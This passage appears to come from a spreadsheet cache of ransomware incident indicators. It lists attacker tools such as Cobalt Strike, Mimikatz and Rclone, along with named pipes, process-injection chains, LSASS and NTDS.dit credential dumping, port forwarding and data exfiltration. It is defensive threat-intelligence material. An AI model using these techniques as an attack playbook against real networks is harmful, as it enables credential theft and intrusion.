    <s v="commandline = svchost.exe -k UnistackSvcGroup -s WpnUserService, netcon 445"/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0107"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="15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15"/>
  </r>
  <r>
    <s v="ransom-eid0109"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0110"/>
    <m/>
    <m/>
    <s v="Advanced Ip Scanner"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0111"/>
    <m/>
    <m/>
    <s v="Seatbelt"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0112"/>
    <m/>
    <m/>
    <s v="Rclone"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0113"/>
    <m/>
    <m/>
    <s v="Mega"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0114"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0115"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="Injected in mstsc.exe, searchindexer.exe, rundll32.exe"/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0116"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Scan 445, 3389, 135, 21"/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0117"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="netlogon exploited"/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0118"/>
    <m/>
    <m/>
    <s v="Atera Agent"/>
    <m/>
    <m/>
    <s v="AteraAgent.exe"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ransom-eid0119"/>
    <m/>
    <m/>
    <s v="SplashTop"/>
    <m/>
    <m/>
    <s v="SplashtopStreamer3360.exe"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ransom-eid0120"/>
    <m/>
    <s v="Named Pipe"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="pipeName: \MSSE-3328-server and Image: 61582ab.exe_x000a_pipeName: \MSSE-7344-server and Image: 044b7e1.exe"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ransom-eid0121"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="regsvr32.exe created remote thread to winlogon.exe"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ransom-eid0122"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="winlogon.exe made DNS query"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ransom-eid0123"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v=".dll or regsvr32.exe connecting to internet "/>
    <x v="17"/>
  </r>
  <r>
    <s v="ransom-eid0124"/>
    <m/>
    <m/>
    <s v="BloodHound"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0125"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0126"/>
    <m/>
    <m/>
    <s v="LaZagne"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0127"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0128"/>
    <m/>
    <m/>
    <s v="ProcDump"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0129"/>
    <m/>
    <m/>
    <s v="Ammy Admin"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0130"/>
    <m/>
    <m/>
    <s v="Advanced Ip Scanner"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0131"/>
    <m/>
    <m/>
    <s v="RedLine Stealer"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0132"/>
    <m/>
    <m/>
    <s v="NBMiner"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0133"/>
    <m/>
    <m/>
    <s v="GMER"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0134"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0135"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0136"/>
    <m/>
    <m/>
    <s v="Process Explorer"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0137"/>
    <m/>
    <m/>
    <s v="PowerView"/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0138"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0139"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="PowerShell Empire"/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0140"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="use ntdsutil to dump the NTDS.dit database"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0141"/>
    <m/>
    <m/>
    <s v="ScreenConnect"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0142"/>
    <m/>
    <m/>
    <s v="SplashTop"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0143"/>
    <m/>
    <m/>
    <s v="Zoho Assist"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0144"/>
    <m/>
    <m/>
    <s v="Fixme It"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0145"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0146"/>
    <m/>
    <m/>
    <s v="Atera Agent"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0147"/>
    <m/>
    <m/>
    <s v="Psexec"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0148"/>
    <m/>
    <m/>
    <s v="Impacket"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0149"/>
    <m/>
    <m/>
    <s v="Secretsdump.py"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0150"/>
    <m/>
    <m/>
    <s v="veeam-get-creds.ps1"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0151"/>
    <m/>
    <m/>
    <s v="ProcDump"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0152"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0153"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0154"/>
    <m/>
    <m/>
    <s v="Plink"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0155"/>
    <m/>
    <m/>
    <s v="Teamviewer"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0156"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0157"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0158"/>
    <m/>
    <m/>
    <s v="PDQ Deploy"/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0159"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0160"/>
    <m/>
    <m/>
    <s v="Rclone"/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0161"/>
    <m/>
    <m/>
    <s v="Advanced Ip Scanner"/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0162"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0163"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Scanned ports 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389"/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0164"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0165"/>
    <m/>
    <m/>
    <s v="Gmer"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0166"/>
    <m/>
    <m/>
    <s v="IOBit"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0167"/>
    <m/>
    <m/>
    <s v="PowerTool/64"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0168"/>
    <m/>
    <m/>
    <s v="Grixba"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0169"/>
    <m/>
    <m/>
    <s v="ProcessHacker"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0170"/>
    <m/>
    <m/>
    <s v="Plink"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0171"/>
    <m/>
    <m/>
    <s v="Nltest"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0172"/>
    <m/>
    <m/>
    <s v="WinPEAS"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0173"/>
    <m/>
    <m/>
    <s v="WinSCP"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0174"/>
    <m/>
    <m/>
    <s v="WinRAR"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0175"/>
    <m/>
    <m/>
    <s v="Nekto - PriviCMD"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0176"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0177"/>
    <m/>
    <m/>
    <s v="AdFind"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0178"/>
    <m/>
    <m/>
    <s v="BloodHound"/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0179"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0180"/>
    <m/>
    <m/>
    <s v="Bloodhound/Sharphound"/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0181"/>
    <m/>
    <m/>
    <s v="Nirsoft"/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0182"/>
    <m/>
    <m/>
    <s v="Passview"/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0183"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0184"/>
    <m/>
    <m/>
    <s v="ProcessHacker"/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0185"/>
    <m/>
    <m/>
    <s v="PowerTool "/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0186"/>
    <m/>
    <m/>
    <s v="Universal Virus Sniffer"/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0187"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0188"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0189"/>
    <m/>
    <m/>
    <s v="Connectwise"/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0190"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0191"/>
    <m/>
    <m/>
    <s v="N-Able"/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0192"/>
    <m/>
    <m/>
    <s v="Rclone"/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0193"/>
    <m/>
    <m/>
    <s v="Metasploit"/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0194"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="BITSADMIN for ingress"/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0195"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Sliver "/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0196"/>
    <m/>
    <m/>
    <s v="SMBExec"/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0197"/>
    <m/>
    <m/>
    <s v="CrackMapExec"/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0198"/>
    <m/>
    <m/>
    <s v="Angry IP Scanner"/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0199"/>
    <m/>
    <m/>
    <s v="Adfind"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0200"/>
    <m/>
    <m/>
    <s v="Advanced Ip Scanner"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0201"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0202"/>
    <m/>
    <m/>
    <s v="LaZagne"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0203"/>
    <m/>
    <m/>
    <s v="PCHunter64"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0204"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0205"/>
    <m/>
    <m/>
    <s v="Ngrok"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0206"/>
    <m/>
    <m/>
    <s v="Rclone"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0207"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0208"/>
    <m/>
    <m/>
    <s v="WinSCP"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0209"/>
    <m/>
    <m/>
    <s v="CloudZilla"/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0210"/>
    <m/>
    <m/>
    <s v="Ngrok"/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0211"/>
    <m/>
    <m/>
    <s v="Rsocks SOCKS5"/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0212"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0213"/>
    <m/>
    <m/>
    <s v="Advanced Port Scanner"/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0214"/>
    <m/>
    <m/>
    <s v="SharpShares"/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0215"/>
    <m/>
    <m/>
    <s v="PingCastle"/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0216"/>
    <m/>
    <m/>
    <s v="Impacket"/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0217"/>
    <m/>
    <m/>
    <s v="MegaSync"/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0218"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0219"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0220"/>
    <m/>
    <m/>
    <s v="BackStab"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0221"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0222"/>
    <m/>
    <m/>
    <s v="WinSCP"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0223"/>
    <m/>
    <m/>
    <s v="SplashTop"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0224"/>
    <m/>
    <m/>
    <s v="ScreenConnect"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0225"/>
    <m/>
    <m/>
    <s v="Rclone"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0226"/>
    <m/>
    <m/>
    <s v="PowerShell"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0227"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0228"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0229"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="BITSADMIN for ingress"/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0230"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0231"/>
    <m/>
    <m/>
    <s v="BadPotato"/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0232"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="github[.]com/BronzeTicket/SharpNBTScan - nbt.exe"/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0233"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="SpnDump.exe"/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0234"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="SharpGPPPass.exe"/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0235"/>
    <m/>
    <m/>
    <s v="MegaSync"/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0236"/>
    <m/>
    <m/>
    <s v="SharpShares"/>
    <m/>
    <m/>
    <m/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0237"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="SharZeroLogon.exe"/>
    <x v="27"/>
  </r>
  <r>
    <s v="ransom-eid0238"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="rundll32.exe netcon to port 135"/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0239"/>
    <m/>
    <s v="Default Named Pipes "/>
    <m/>
    <m/>
    <m/>
    <s v="postex_17e9, postex_320d, postex_55f8, postex_972d"/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0240"/>
    <m/>
    <s v="Cobalt Strike Pipes"/>
    <m/>
    <m/>
    <m/>
    <s v="C\users\&lt;user&gt;\AppData\Local\wab.exe, C:\Windows\system32\rundll32.exe, C:Windows\Explorer.exe, C:\Windows\system32\svchost.exe"/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0241"/>
    <m/>
    <m/>
    <s v="Adfind"/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0242"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0243"/>
    <m/>
    <m/>
    <s v="ProcDump"/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0244"/>
    <m/>
    <m/>
    <s v="Seatbelt"/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0245"/>
    <m/>
    <m/>
    <s v="VulnRecon"/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0246"/>
    <m/>
    <s v="process spawn "/>
    <m/>
    <m/>
    <m/>
    <s v="rundll32 namr.dll,IternalJob &gt; WmiPrvSE.exe &gt; wab.exe"/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0247"/>
    <m/>
    <s v="Create Remote Thread"/>
    <m/>
    <m/>
    <m/>
    <s v="wab.exe &gt; rundll32.exe"/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0248"/>
    <m/>
    <s v="Create Remote Thread"/>
    <m/>
    <m/>
    <m/>
    <s v="wab.exe &gt; explorer.exe"/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0250"/>
    <m/>
    <m/>
    <s v="ShareFinder"/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0251"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="svchost added reg key HKLM\SOFTWARE\Microsoft Windows NT\CurrentVersion\Schedule\TaskCache\Tree{&lt;uuid&gt;}"/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0252"/>
    <m/>
    <s v="AnyDesk ad.Trace Logs "/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Users\&lt;user&gt;\AppData\Roaming\AnyDesk"/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0253"/>
    <m/>
    <s v="AnyDesk ad_svc.trace in install point"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\UProgramData\AnyDesk"/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0254"/>
    <m/>
    <s v="built-in netsh portproxy command to port forward 3390 on the local host, to 3389 (RDP) on the remote host."/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0255"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="process injection to svchost"/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0256"/>
    <m/>
    <s v="LSASS Cred Dumping via Coblat Strike"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0257"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="cmd.exe /c echo 84de2daa8cd &gt; \\.\pipe\fe6d1e"/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0258"/>
    <m/>
    <s v="Data Exfil"/>
    <s v="Rclone"/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0259"/>
    <m/>
    <s v="Data Exfil to AWS S3 Buckets "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0260"/>
    <m/>
    <m/>
    <s v="Seatbelt"/>
    <m/>
    <m/>
    <s v="c:\programData\full_info.txt"/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0261"/>
    <m/>
    <s v="Log into multiple host via powershell remoting "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0262"/>
    <m/>
    <s v="Cobalt Strike Pipes"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="C:Windows\system32\winlogon.exe (PID: 572) accessed pipe \postex_eb6d"/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0263"/>
    <m/>
    <s v="Cobalt Strike Pipes"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="C:Windows\system32rundll32.exe (PID: 6944) created pipe \postex_eb6d"/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0264"/>
    <m/>
    <s v="Remote Thread"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="C:Windows\system32rundll32.exe (PID: 8896) created remote thread in C:Windows\system32\winlogon.exe (PID: 572)"/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0265"/>
    <m/>
    <s v="Process Injection"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="C:\Windows\System32\winlogon.exe (PID:572) created C:\Windows\System32\rundll32.exe (PID: 6944)"/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0266"/>
    <m/>
    <s v="Process Injection"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\spoolsv.exe"/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0267"/>
    <m/>
    <s v="Process Injection"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k ftpsvc"/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0268"/>
    <m/>
    <s v="Process Injection"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k netsvcs"/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0269"/>
    <m/>
    <s v="LSASS Dumped via WerFault Crash"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0270"/>
    <m/>
    <s v="Custom Compiled Mimikatz binary"/>
    <m/>
    <m/>
    <m/>
    <s v="m2.exe"/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0271"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <s v="Scanned ort 3389 on many Ips"/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0272"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <s v="Scanned 80, 135, 445, 3389"/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0273"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="pipe created \postex_6be7"/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0274"/>
    <m/>
    <m/>
    <s v="Adfind"/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0275"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0276"/>
    <m/>
    <m/>
